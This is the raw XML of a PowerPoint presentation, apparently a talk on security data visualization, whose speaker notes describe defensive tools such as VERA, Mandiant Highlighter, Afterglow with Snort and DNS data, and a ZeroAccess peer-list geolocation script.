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52.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide49.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide33.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Default Extension="bin" ContentType="application/vnd.openxmlformats-officedocument.presentationml.printerSettings"/>
  <Override PartName="/ppt/embeddings/oleObject10.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
  <Override PartName="/ppt/notesSlides/notesSlide30.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/embeddings/oleObject5.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
  <Override PartName="/ppt/notesSlides/notesSlide13.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>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slides/slide56.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slides/slide23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide42.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/embeddings/oleObject9.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
  <Override PartName="/ppt/embeddings/oleObject16.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
  <Override PartName="/ppt/slideLayouts/slideLayout10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide17.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s/slide46.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/embeddings/oleObject2.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
  <Override PartName="/ppt/notesSlides/notesSlide26.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notes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53.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide15.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/embeddings/oleObject11.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
  <Override PartName="/ppt/notesSlides/notesSlide31.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/slides/slide20.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/embeddings/oleObject6.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
  <Override PartName="/ppt/presProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presProps+xml"/>
  <Override PartName="/ppt/embeddings/oleObject13.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>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57.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slides/slide24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide43.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/theme/theme2.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/handoutMasters/handoutMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.handoutMaster+xml"/>
  <Override PartName="/ppt/embeddings/oleObject17.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
  <Override PartName="/ppt/slideLayouts/slideLayout11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide18.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Default Extension="jpeg" ContentType="image/jpeg"/>
  <Override PartName="/ppt/notesSlides/notesSlide23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Default Extension="vml" ContentType="application/vnd.openxmlformats-officedocument.vmlDrawing"/>
  <Override PartName="/ppt/slides/slide12.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide28.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Layouts/slideLayout6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slides/slide31.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/embeddings/oleObject3.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
  <Default Extension="emf" ContentType="image/x-emf"/>
  <Override PartName="/ppt/notesSlides/notesSlide11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide27.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/slides/slide16.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide35.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide54.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/embeddings/oleObject12.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
  <Override PartName="/ppt/slides/slide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide32.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/slides/slide21.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide40.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/embeddings/oleObject7.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
  <Override PartName="/ppt/embeddings/oleObject14.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
  <Override PartName="/ppt/notesSlides/notesSlide15.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/slides/slide39.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide58.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+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theme/theme3.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/embeddings/oleObject18.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
  <Override PartName="/ppt/slideLayouts/slideLayout12.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide19.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlid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s/slide51.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide48.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide10.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viewProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.viewProps+xml"/>
  <Override PartName="/ppt/slides/slide29.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/embeddings/oleObject4.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>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slides/slide55.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/presentation.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presentation.main+xml"/>
  <Override PartName="/ppt/slides/slide2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide22.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide41.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide60.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/embeddings/oleObject8.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
  <Override PartName="/ppt/embeddings/oleObject15.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
  <Override PartName="/ppt/notesSlides/notesSlide16.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/slides/slide59.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide21.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/slides/slide6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slides/slide10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide26.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide45.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/embeddings/oleObject1.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>
  <Default Extension="png" ContentType="image/png"/>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p:sldMasterIdLst>
    <p:sldMasterId id="2147483648" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId62"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId63"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="288" r:id="rId2"/>
    <p:sldId id="289" r:id="rId3"/>
    <p:sldId id="290" r:id="rId4"/>
    <p:sldId id="291" r:id="rId5"/>
    <p:sldId id="292" r:id="rId6"/>
    <p:sldId id="293" r:id="rId7"/>
    <p:sldId id="294" r:id="rId8"/>
    <p:sldId id="295" r:id="rId9"/>
    <p:sldId id="296" r:id="rId10"/>
    <p:sldId id="297" r:id="rId11"/>
    <p:sldId id="298" r:id="rId12"/>
    <p:sldId id="299" r:id="rId13"/>
    <p:sldId id="300" r:id="rId14"/>
    <p:sldId id="301" r:id="rId15"/>
    <p:sldId id="302" r:id="rId16"/>
    <p:sldId id="303" r:id="rId17"/>
    <p:sldId id="304" r:id="rId18"/>
    <p:sldId id="348" r:id="rId19"/>
    <p:sldId id="305" r:id="rId20"/>
    <p:sldId id="306" r:id="rId21"/>
    <p:sldId id="307" r:id="rId22"/>
    <p:sldId id="308" r:id="rId23"/>
    <p:sldId id="349" r:id="rId24"/>
    <p:sldId id="310" r:id="rId25"/>
    <p:sldId id="311" r:id="rId26"/>
    <p:sldId id="312" r:id="rId27"/>
    <p:sldId id="313" r:id="rId28"/>
    <p:sldId id="314" r:id="rId29"/>
    <p:sldId id="315" r:id="rId30"/>
    <p:sldId id="316" r:id="rId31"/>
    <p:sldId id="317" r:id="rId32"/>
    <p:sldId id="318" r:id="rId33"/>
    <p:sldId id="319" r:id="rId34"/>
    <p:sldId id="320" r:id="rId35"/>
    <p:sldId id="321" r:id="rId36"/>
    <p:sldId id="322" r:id="rId37"/>
    <p:sldId id="323" r:id="rId38"/>
    <p:sldId id="324" r:id="rId39"/>
    <p:sldId id="325" r:id="rId40"/>
    <p:sldId id="326" r:id="rId41"/>
    <p:sldId id="327" r:id="rId42"/>
    <p:sldId id="350" r:id="rId43"/>
    <p:sldId id="329" r:id="rId44"/>
    <p:sldId id="330" r:id="rId45"/>
    <p:sldId id="331" r:id="rId46"/>
    <p:sldId id="332" r:id="rId47"/>
    <p:sldId id="333" r:id="rId48"/>
    <p:sldId id="334" r:id="rId49"/>
    <p:sldId id="335" r:id="rId50"/>
    <p:sldId id="336" r:id="rId51"/>
    <p:sldId id="337" r:id="rId52"/>
    <p:sldId id="338" r:id="rId53"/>
    <p:sldId id="339" r:id="rId54"/>
    <p:sldId id="340" r:id="rId55"/>
    <p:sldId id="341" r:id="rId56"/>
    <p:sldId id="342" r:id="rId57"/>
    <p:sldId id="343" r:id="rId58"/>
    <p:sldId id="344" r:id="rId59"/>
    <p:sldId id="347" r:id="rId60"/>
    <p:sldId id="346" r:id="rId6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xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/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showNarration="1">
    <p:present/>
    <p:sldAll/>
    <p:penClr>
      <a:prstClr val="red"/>
    </p:penClr>
    <p:extLst>
      <p:ext uri="{EC167BDD-8182-4AB7-AECC-EB403E3ABB37}">
        <p14:laserClr xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns="">
          <a:srgbClr val="FF0000"/>
        </p14:laserClr>
      </p:ext>
      <p:ext uri="{2FDB2607-1784-4EEB-B798-7EB5836EED8A}">
        <p14:showMediaCtrls xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns="" val="1"/>
      </p:ext>
    </p:extLst>
  </p:showPr>
  <p:clrMru>
    <a:srgbClr val="4F81BD"/>
    <a:srgbClr val="4F5981"/>
  </p:clrMru>
  <p:extLst>
    <p:ext uri="{E76CE94A-603C-4142-B9EB-6D1370010A27}">
      <p14:discardImageEditData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p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns="" val="220"/>
    </p:ext>
    <p:ext uri="{FD5EFAAD-0ECE-453E-9831-46B23BE46B34}">
      <p15:chartTrackingRefBased xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" xmlns="" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/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4706" autoAdjust="0"/>
    <p:restoredTop sz="88810" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="-2008" y="-888"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1632"/>
        <p:guide pos="5232"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.emf"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.emf"/><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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.emf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.emf"/><Relationship Id="rId10"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FCC8112-5209-0A47-913B-CEC05FB92CC0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/24/15</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29580F4-0F95-6D41-8E53-BBA4CC02BA4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>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0" cy="464820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="93166" tIns="46583" rIns="93166" bIns="46583" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3970939" y="0"/>
            <a:ext cx="3037840" cy="464820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="93166" tIns="46583" rIns="93166" bIns="46583" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{87A8DBD3-FD77-D64E-8DAA-2CBB7405D4BE}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/24/15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66" tIns="46583" rIns="93166" bIns="46583"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66" tIns="46583" rIns="93166" bIns="4658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8829966"/>
            <a:ext cx="3037840" cy="464820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="93166" tIns="46583" rIns="93166" bIns="46583" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3970939" y="8829966"/>
            <a:ext cx="3037840" cy="464820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="93166" tIns="46583" rIns="93166" bIns="46583" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{C0A215F4-8CC9-4EF3-B3E9-AEBE79C5C78B}"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850477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fbi.gov/page2/oct09/phishphry_100709.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.fbi.gov/pressrel/speeches/mueller100709.htm" TargetMode="External"/><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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ilektrojohn.github.io/creepy/"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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hyprwired/osint-opsec-tool%23readme"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A215F4-8CC9-4EF3-B3E9-AEBE79C5C78B}"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Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> of mine that initially was built to visualize a ‘peer list’ found on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ZeroAccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> infected machine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Performs a Geo-location match of IP using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Maxmind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> API </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Second searches through malware site to see if IP is known hostile </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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0063" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VERA is a visualization tool for analyzing compiled code. It reduces the overall time of analysis and quickly gives the reverse engineer a high level overview of the runtime behavior of a program. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Home: http://csr.lanl.gov/vera/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mandiant’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Highligher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tool that creates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a histogram of a log file over time. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This can also be used to do keyword searches and assist in filtering down to the lines of interest in the log file </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Home: https://www.mandiant.com/resources/download/highlighter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>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Arcsight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Visualization (afterglow)  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> This is a visualization showing DNS queries from Private (RFC 1918) addresses to outside DNS servers and the query status (success/failure) during ‘off-peak’ hours </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{979C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>20</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10750934"/>
      </p:ext>
    </p:extLst>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24 hours of Snort events visualized using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Afterglow </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The original creator was using SGUIL as well so he created a second tool to help take SGUIL data formats and convert them into something Afterglow could process. - http://www.pintumbler.org/Code/edv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Source:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> http://secviz.org/content/a-day-ids-snort-event-data</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79C8A94-F62E-4072-B85F-8EC1A23AAB45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21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Tcpdstats</a:t>
            </a:r>
